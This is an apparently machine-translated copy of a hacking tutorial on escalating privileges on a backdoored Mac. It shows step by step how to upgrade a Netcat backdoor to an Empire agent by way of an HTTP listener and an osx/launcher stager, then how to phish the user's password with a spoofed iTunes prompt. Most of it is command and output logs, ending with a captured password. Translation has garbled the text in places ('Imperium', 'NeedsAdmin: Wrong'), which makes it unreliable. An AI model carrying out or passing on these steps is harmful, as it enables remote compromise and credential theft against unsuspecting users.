قالب وردپرس درنا توس
Home / Tips and Tricks / How Do I Perform Privilege Escalation, Part 2 (Password Phishing) «Null Byte :: WonderHowTo

How Do I Perform Privilege Escalation, Part 2 (Password Phishing) «Null Byte :: WonderHowTo



Finding and misusing unsafe permissions files is a simple and surefire way to increase shell privileges on a backdoored Mac OS device. This time, we'll be more aggressive in trying to phish a user's logon password by asking a convincing pop-up message only the destination for their password.

This privilege escalation method consists of the attacker invoking a prompt that instructs the target user to enter their password in a convincing pop-up window. The module Empire prompt allows us to spoof which application requests the login password of the user. So we can make iTunes, the App Store or an installed app to request a password for a credible social engineering attack.

As we can see when using the whoami command, the established Netcat backdoor is not root but instead a normal user (tokyoneon).

  bash-3.2 $ whoami
tokyoneon 

The first thing we want to do is turn our primitive Netcat backdoor into a full-featured Empire backdoor. This article assumes that readers have experience with Empire. Beginners should refer to zero bytes of Getting Started and Storing Guides before proceeding.

Step 1
: Start an Empire Listener

Start Empire with a Listener waiting for incoming connections from the destination MacBook. In this example, I'm using an HTTP listener on port 8080. The following commands can be used to quickly set up an Empire listener:

  (Empire)> listeners
[!] Currently no listeners are active
(Empire: listener)> uselistener http
(Empire: Listeners / http)> set port 8080
(Empire: Listener / http)> Set host xx.xx.xx.xx
(Empire: Listener / http)> execute
[*] Starting Listener "http"
* Serving Flask App "http" (lazy loading)
* Environment: Production
WARNING: Do not use the development server in a production environment.
Use a WSGI production server instead.
* Debug mode: off
[+] Listener successfully started!
(Empire: Listener / http)> Listener

[*] Active listeners:

Host delay / jitter of the name module
---- ------ ---- -----------
http http http: //xx.xx.xx.xx: 8080 5 / 0,0

(Empire: Listeners)> _ 

The "host" address can be the local network IP address or VPS address for remote attacks.

Step 2: Create an OSX Stager

Next, create a launcher script with Osx / Launcher Stager. This can be done with the following commands:

  usestager osx / launcher
Set Listener http
generate 

The entire launcher output should be copied and pasted into the Netcat terminal. Including the parts "echo" and "python" at the beginning and end of the issue.

A New Agent Will Appear in the Empire Terminal We Will Explode the MacBook

  (Empire: agents)> [*] Send PYTHON-Stage (Level 1) to xx.xx.xx.xx
[*] Agent P98MAEE0 from xx.xx.xx.xx has posted a valid Python PUB key
[*] The new agent P98MAEE0 has checked in
[+] Initial agent P98MAEE0 of xx.xx.xx.xx is now active (Slack)
[*] Send agent (level 2) to P98MAEE0 at xx.xx.xx.xx
[>] ...................

(Imperium: Agents)> _ 

Step 3: Select your destination and module

Use the command interact to issue commands to the compromised macOS device.

  (Empire: stager / osx / launcher)> interact with P98MAEE0
(Empire: P98MAEE0)> 

Activate the module collection / osx / prompt with the command usemodule . Then use the command info to display the available options of the modules

  (Empire: P98MAEE0)> usemodule collection / osx / prompt
(Empire: Python / Collection / Osx / Command Prompt)> About

Name: prompt
Module: Python / Collection / OSX / Command Prompt
NeedsAdmin: Wrong
OpsecSafe: Wrong
Language: Python
MinLanguageVersion: 2.6
Background: Wrong
OutputExtension: None

authors:
@ FuzzyNop
@ harmj0y

Description:
Starts a specified application with a prompt for
Credentials with osascript.

Remarks:
https://github.com/fuzzynop/FiveOnceInYourLife

options:

Name Required value Description
---- -------- ------- -----------
ListApps Wrong switch. List applications for
Start.
SandboxMode Wrong switch. Start a sandbox-safe command prompt
Agent True P98MAEE0 Agent on which to run the module.
AppName True Google Chrome The name of the application to launch.

(Empire: python / collection / osx / prompt)> 

Step 4: Get a list of installed applications

The ListApps option returns a list of applications installed on the macOS device. Set the value to true and execute the module

  (Empire: python / collection / osx / prompt)> set ListApps true
(Empire: Python / Collection / Osx / Command Prompt)>
[>] module is not opsec safe, run? [y/N] y
[*] TASK_CMD_WAIT was executed with P98MAEE0
[*] Agent P98MAEE0 has been tasked with task ID 1
[*] Agent p98MAEE0 ran the python / collection / osx / prompt module
(Empire: python / collection / osx / prompt)> [*] Agent P98MAEE0 returned results.

Available applications:

[1] DVD player
[2] Siri
[3] QuickTime player
[4] Chess
[5] Photo Booth
[6] Notes
[7] Image Capture
[8] iBooks
[9] Google Chrome
[10] Preview
[11] Dashboard
[12] TextEdit
[13] Post
[14] Safari
[15] Dictionary
[16] Contacts
[17] Time machine
[18] Utilities
[19] Fontbook
[20] FaceTime
[21] Cards
[22] Mission Control
[23] Stickies
[24] Photos
[25] News
[26] Calculator
[27] iTunes
[28] Firefox
[29] Launchpad
[30] Memories
[31] App Store
[32] Automator
[33] Calendar
[34] System Settings 

Before you select an application, the ListApps value is disabled so that the module does not continuously return the list of applications.

  (Empire: python / collection / osx / prompt)> unset ListApps 

By default, there are many suitable applications for this attack.

Step 5: Select an application and execute the attack

To select an application, set the value "AppName" for the application name. In my example, I am using iTunes. Punctuation is important here. Note the capital letter "T" in iTunes. The AppName value must be the same as in the list of apps above.

  (Empire: python / collection / osx / prompt)> Set AppName to iTunes
(Empire: Python / Collection / Osx / Command Prompt)>
[>] module is not opsec safe, run? [y/N] y
[*] TASK_CMD_WAIT was executed with P98MAEE0
[*] Agent P98MAEE0 has been assigned task ID 2
[*] Task Agent Agent P98MAEE0 to run module python / collection / osx / prompt 

After a few seconds, the target user is prompted with a password request from the application of your choice.

After sending the password, the Empire Terminal displays the following results:

  (Empire: python / collection / osx / prompt)> [*] Agent P98MAEE0 returned results.
Button returned: OK, text returned: super-secret-password-54321 

If the target user fires while searching iTunes media or is heavily engaged in work, they do not hesitate to enter their password to make that annoying call to remove

Backdoor Attack Defense

Defense against such attacks is difficult. Antivirus software can usually be bypassed with a few simple tricks, so it's not a very reliable defense solution. If you receive random password prompts or your MacBook fans heat up unexpectedly, it may indicate that your Mac OS device has been compromised. In my next article, I'll talk about a few strategies to identify backdoors on your MacOS devices … so stay tuned.

Do Not Miss: How to Break into a FileVault Encrypted MacBook

Cover Picture by Christina Morillo / PEXELS; Screenshots of tokyoneon / zero byte

Source link